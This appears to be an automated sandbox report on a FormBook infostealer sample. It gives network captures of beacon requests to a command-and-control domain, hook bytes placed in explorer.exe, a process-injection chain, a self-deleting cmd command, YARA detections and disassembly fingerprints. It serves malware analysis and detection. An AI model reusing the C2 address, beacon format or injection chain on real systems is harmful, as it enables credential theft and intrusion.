                                                    Nov 20, 2020 20:06:07.947180033 CET5066INData Raw: 6a 36 2f 58 49 65 6b 4d 2f 31 41 38 70 49 4a 4a 6b 4d 58 4d 41 6d 42 45 4b 61 2b 4c 54 51 76 4c 41 41 41 33 58 49 48 31 4d 41 72 61 79 6e 69 33 4d 5a 6a 47 62 32 63 67 6d 51 36 7a 70 72 4b 55 66 45 4d 52 53 36 48 41 6f 67 4d 59 71 52 5a 6f 4d 54
                                                    Data Ascii: j6/XIekM/1A8pIJJkMXMAmBEKa+LTQvLAAA3XIH1MArayni3MZjGb2cgmQ6zprKUfEMRS6HAogMYqRZoMTWQZIccoRFJhG7CMlZQouypU/XmVWcnqSGnJVXYtZy4d8X+nJfSygrEV55+41jGZGtBg3T/8W3S8m4yt/uMYQvxDS+OAyIyRA1aybAKlcVYRxPlL4+DqGKOXla5+lo2XKE0oKI9V6e+VqE4oWDlWq/7BGnbBSpYCqy


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.349741162.0.232.11880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:06:28.447581053 CET5134OUTGET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1
                                                    Host: www.auctionpros.club
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:06:28.654195070 CET5136INHTTP/1.1 404 Not Found
                                                    Date: Fri, 20 Nov 2020 19:06:28 GMT
                                                    Server: Apache
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html
                                                    Connection: close
                                                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
                                                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .conta
                                                    Nov 20, 2020 20:06:28.654263020 CET5137INData Raw: 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64
                                                    Data Ascii: ct-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a
                                                    Nov 20, 2020 20:06:28.654303074 CET5139INData Raw: 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20
                                                    Data Ascii: nfo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
                                                    Nov 20, 2020 20:06:28.654356003 CET5140INData Raw: 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                    Data Ascii: ght: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info {
                                                    Nov 20, 2020 20:06:28.654402971 CET5141INData Raw: 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79
                                                    Data Ascii: IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfF
                                                    Nov 20, 2020 20:06:28.654443979 CET5143INData Raw: 4f 72 56 30 52 49 71 2f 36 2b 42 49 50 50 56 56 4c 72 62 41 56 41 75 6c 51 4b 49 77 41 4f 2f 39 6a 55 4b 79 4a 6b 35 31 53 6d 4f 35 77 77 68 70 48 58 61 63 30 45 33 45 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34
                                                    Data Ascii: OrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMX
                                                    Nov 20, 2020 20:06:28.654776096 CET5144INData Raw: 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45
                                                    Data Ascii: PTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua
                                                    Nov 20, 2020 20:06:28.654820919 CET5145INData Raw: 3e 0a 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20
                                                    Data Ascii: > <section class="additional-info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_mis


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: vOKMFxiCYt.exe PID: 2764 Parent PID: 5484

                                                    General

                                                    Start time:20:04:28
                                                    Start date:20/11/2020
                                                    Path:C:\Users\user\Desktop\vOKMFxiCYt.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\vOKMFxiCYt.exe'
                                                    Imagebase:0x620000
                                                    File size:711168 bytes
                                                    MD5 hash:BB30A5DD4130B071FB4CA5F005371C63
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: RegSvcs.exe PID: 5984 Parent PID: 2764

                                                    General

                                                    Start time:20:04:30
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Imagebase:0xce0000
                                                    File size:45152 bytes
                                                    MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 5984

                                                    General

                                                    Start time:20:04:32
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff714890000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: raserver.exe PID: 5028 Parent PID: 3388

                                                    General

                                                    Start time:20:04:42
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                    Imagebase:0x1170000
                                                    File size:108544 bytes
                                                    MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 6040 Parent PID: 5028

                                                    General

                                                    Start time:20:04:46
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                    Imagebase:0xbd0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 4104 Parent PID: 6040

                                                    General

                                                    Start time:20:04:46
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: vOKMFxiCYt.exe PID: 2764 Parent PID: 5484 vOKMFxiCYt.exeCOMMON

                                                      Executed Functions

                                                      Function 05009B80, Relevance: 2.6, Instructions: 2605COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bafe7770034723df113d5e0be2e078cc5fd170d560a1137cfb5f2ba68610d938
                                                      • Instruction ID: 4ee0a1e494fa105f49a1f3ed55c3cc28794eec493cd9b7a8f40f194d25adb6e9
                                                      • Opcode Fuzzy Hash: bafe7770034723df113d5e0be2e078cc5fd170d560a1137cfb5f2ba68610d938
                                                      • Instruction Fuzzy Hash: C2430774A002198FDB64DF68D888AADB7B2FF89310F1596D5D409AB3A1DB34ED81CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05007E28, Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: xD;v
                                                      • API String ID: 0-2106083650
                                                      • Opcode ID: ae6f3cdc6988a338762a39247d4290c6e4bb6a3bbb1a0bf7c46739af3564cbe8
                                                      • Instruction ID: ecd2e7889707101b386fb92cb8b404b827f154d7c0e88bc190a3c035575cd51e
                                                      • Opcode Fuzzy Hash: ae6f3cdc6988a338762a39247d4290c6e4bb6a3bbb1a0bf7c46739af3564cbe8
                                                      • Instruction Fuzzy Hash: 99415974D0520EDFDB04CFA5E4415AEFBB2FB89344F10A52AD411B7394E738AA058F51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05008E28, Relevance: .7, Instructions: 726COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a329e42c88939a8e1862c11f1344a9331e653cbb12e8828de9d769f635f96b1
                                                      • Instruction ID: 68293d6d7b9af3bcb99c607e846164cec72d9742fa68fb86de2353c4adc32511
                                                      • Opcode Fuzzy Hash: 7a329e42c88939a8e1862c11f1344a9331e653cbb12e8828de9d769f635f96b1
                                                      • Instruction Fuzzy Hash: 26527D34B041159FDB58DF68E488AAEB7F2BF89314F159469E806DB3A1DB31DC41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05004CC0, Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ad91545267dbda6695a59956f1774438e57d928f79126ee71ed9f766bf9d9e9
                                                      • Instruction ID: 89edbd1c21d0f60d227d883eb751fab9ebb41410e3f6cbc6a3a3f08735c74081
                                                      • Opcode Fuzzy Hash: 1ad91545267dbda6695a59956f1774438e57d928f79126ee71ed9f766bf9d9e9
                                                      • Instruction Fuzzy Hash: 46E11674E04218DFDB18CFA4E884BADBBF2BF89304F10946AD50AAB294DB749945CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112E266, Relevance: .2, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 4cd5735a3e14e14199e2774248256677f3cfb1bebb0179944f2945f1dd4fac78
                                                      • Instruction ID: 3db266b8ef6034c5d24e2a19f178d20f3aff8f39c46392759d8df4924e0b9e71
                                                      • Opcode Fuzzy Hash: 4cd5735a3e14e14199e2774248256677f3cfb1bebb0179944f2945f1dd4fac78
                                                      • Instruction Fuzzy Hash: AE81E234E003598FCB04DFA0D8549EDBBBAFF8A304F248219E415AF6A0EB30A955DB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0500DAE8, Relevance: .2, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2dad1fb634e085b1232102d4f723bfb7e1a1ce6c7c20395d899544cf312ae908
                                                      • Instruction ID: c5b6c703fdd888f3c7782ec3cc83f1af628346ad00fbd26497d4af8b446f36de
                                                      • Opcode Fuzzy Hash: 2dad1fb634e085b1232102d4f723bfb7e1a1ce6c7c20395d899544cf312ae908
                                                      • Instruction Fuzzy Hash: 0191F6B5E00618CFDB54DFA9E884AADBBF2FF89304F10946AD409AB255DB709941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01126569, Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 03240af11977c0c08ad3768a8bc7c9f648f0bd0c57504c23ece68d0347ea0369
                                                      • Instruction ID: 0558a3efd960490557307eff05cf47c8703ae11c3146317a9d66765f1dcaebc9
                                                      • Opcode Fuzzy Hash: 03240af11977c0c08ad3768a8bc7c9f648f0bd0c57504c23ece68d0347ea0369
                                                      • Instruction Fuzzy Hash: B3317C34E15215EFCB08CFB5D59469EFBB2EFCA241F24D4AAC406A7298DB349A51CB04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01126578, Relevance: .1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e2dcd8d254b57313802737c11c8a4b9060fc1ea6f3d783a7807049c860b1b78
                                                      • Instruction ID: 73384261ae2171c63e2dc384295f111cae1b8c95f3e48286213dbeaf4f76f6b9
                                                      • Opcode Fuzzy Hash: 7e2dcd8d254b57313802737c11c8a4b9060fc1ea6f3d783a7807049c860b1b78
                                                      • Instruction Fuzzy Hash: 7D217174E15215EFCB0CCFA5D58469EFBF2EBC9341F24D4A6C406A7298DB349A51CB04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112BE68, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 68db9f6bedc5a507db6e43633d3c48b5e04e55f2d005cdaf394f4ebab5ac2300
                                                      • Instruction ID: 6dcb808040cdb6998fce64e665da2f4a99c94d2cfe9fa9a34558f3b820240b4c
                                                      • Opcode Fuzzy Hash: 68db9f6bedc5a507db6e43633d3c48b5e04e55f2d005cdaf394f4ebab5ac2300
                                                      • Instruction Fuzzy Hash: 64713470A00B158FDB28DF69D044BAABBF1FF88204F00892DD58AD7A40DB35E856CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112DF0C, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0112E02A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
